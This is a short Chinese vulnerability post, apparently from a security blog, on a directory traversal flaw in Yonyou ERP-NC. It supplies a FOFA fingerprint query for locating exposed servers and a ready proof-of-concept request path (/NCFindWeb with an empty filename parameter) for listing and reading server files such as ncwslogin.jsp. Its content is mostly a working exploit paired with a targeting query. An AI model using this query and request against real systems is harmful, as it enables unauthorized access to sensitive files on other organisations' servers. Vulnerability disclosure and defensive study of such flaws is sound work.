用友ERP-NC 目录遍历漏洞

# 用友ERP-NC 目录遍历漏洞

## 漏洞描述

用友ERP-NC 存在目录遍历漏洞,攻击者可以通过目录遍历获取敏感文件信息

## 漏洞影响

> [!NOTE]
>
> 用友ERP-NC

## FOFA

> [!NOTE]
>
> app=”用友-UFIDA-NC”

## 漏洞复现

POC为

“`
/NCFindWeb?service=IPreAlertConfigService&filename=
“`

查看 ncwslogin.jsp 文件

## Goby & POC

> [!NOTE]
>
> YongYou ERP-NC directory traversal

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容